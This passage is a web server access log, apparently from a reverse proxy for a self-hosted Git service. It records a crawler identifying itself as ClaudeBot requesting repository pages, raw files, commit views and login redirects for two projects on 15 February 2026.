2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom1.png?display=rendered" [Client 216.73.216.188] [Length 10863] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom6.png?display=rendered" [Client 216.73.216.188] [Length 10864] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/index.tsx?display=rendered" [Client 216.73.216.188] [Length 10913] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/.gitignore?display=source" [Client 216.73.216.188] [Length 11513] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/index.tsx" [Client 216.73.216.188] [Length 9873] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/index.tsx" [Client 216.73.216.188] [Length 351] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom5.png?display=rendered" [Client 216.73.216.188] [Length 10860] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2Fhtml%2FApp.tsx" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/favicon.ico?display=rendered" [Client 216.73.216.188] [Length 10855] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom4.png?display=rendered" [Client 216.73.216.188] [Length 10863] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/index.tsx" [Client 216.73.216.188] [Length 351] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/index.tsx" [Client 216.73.216.188] [Length 9875] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/.gitignore?display=source" [Client 216.73.216.188] [Length 11519] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom1.png" [Client 216.73.216.188] [Length 9883] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom1.png" [Client 216.73.216.188] [Length 2082919] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/dcsintegration.png?display=rendered" [Client 216.73.216.188] [Length 10884] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom6.png" [Client 216.73.216.188] [Length 9883] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/vite.config.ts?display=rendered" [Client 216.73.216.188] [Length 10909] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/favicon.ico" [Client 216.73.216.188] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom6.png" [Client 216.73.216.188] [Length 2102057] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom5.png" [Client 216.73.216.188] [Length 9884] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/favicon.ico" [Client 216.73.216.188] [Length 9898] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-4.conf?display=source" [Client 216.73.216.188] [Length 11721] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom5.png" [Client 216.73.216.188] [Length 1774975] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/vite.config.ts?display=rendered" [Client 216.73.216.188] [Length 10916] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom4.png" [Client 216.73.216.188] [Length 9883] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2F.Backup%2Fhtml%2Fassets%2Fimages%2FControlRoom5.png" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom4.png" [Client 216.73.216.188] [Length 1851586] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2F.Backup%2Fhtml%2Fassets%2Fimages%2FControlRoom4.png" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcommits%2Fbranch%2Fmain%2Fasset_pilot_docker%2F.venv%2Fbin%2Fwebsockets" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2F.Backup%2Fhtml%2Findex.tsx" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2Fnpm%2Fdata%2Flogs" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcommits%2Fbranch%2Fmain%2Fasset_pilot_docker%2F.venv%2Fbin%2Factivate.fish" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2F.Backup%2Fhtml%2Fassets%2Fimages%2FControlRoom3.png" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/dcsintegration.png" [Client 216.73.216.188] [Length 9904] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.gitignore?display=rendered" [Client 216.73.216.188] [Length 10876] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/vite.config.ts" [Client 216.73.216.188] [Length 580] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/watchfiles?display=rendered" [Client 216.73.216.188] [Length 11023] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2Fhtml%2Fcomponents%2FFooter.tsx" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/vite.config.ts" [Client 216.73.216.188] [Length 9887] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2F.Backup%2Fhtml%2Findex.tsx" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom5.png?display=rendered" [Client 216.73.216.188] [Length 10862] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/vite.config.ts" [Client 216.73.216.188] [Length 580] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom4.png?display=rendered" [Client 216.73.216.188] [Length 10864] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/vite.config.ts" [Client 216.73.216.188] [Length 9888] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom5.png" [Client 216.73.216.188] [Length 10877] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/dcsintegration.png" [Client 216.73.216.188] [Length 2525271] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2F.Backup%2Fhtml" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom4.png" [Client 216.73.216.188] [Length 10882] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/App.tsx?display=rendered" [Client 216.73.216.188] [Length 10902] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom3.png?display=rendered" [Client 216.73.216.188] [Length 10864] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/vite.config.ts?display=rendered" [Client 216.73.216.188] [Length 10911] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/index.tsx?display=source" [Client 216.73.216.188] [Length 11663] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2F.Backup%2Fhtml%2Findex.tsx" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom3.png" [Client 216.73.216.188] [Length 10881] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2F.Backup%2Fhtml" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/App.tsx?display=rendered" [Client 216.73.216.188] [Length 10910] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2F.Backup%2Fhtml%2Fvite.config.ts" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2Fhtml%2Fassets%2Fcss" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom2.png?display=rendered" [Client 216.73.216.188] [Length 10864] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.gitignore" [Client 216.73.216.188] [Length 9907] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2Fhtml%2Fcomponents%2FAbout.tsx" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom5.png" [Client 216.73.216.188] [Length 9878] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..main?style=split&whitespace=ignore-change" [Client 216.73.216.188] [Length 453589] [Gzip 15.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom5.png" [Client 216.73.216.188] [Length 1774975] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec...main?style=split&whitespace=ignore-change" [Client 216.73.216.188] [Length 90052] [Gzip 12.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2Fhtml%2Fcomponents%2FHero.tsx" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" 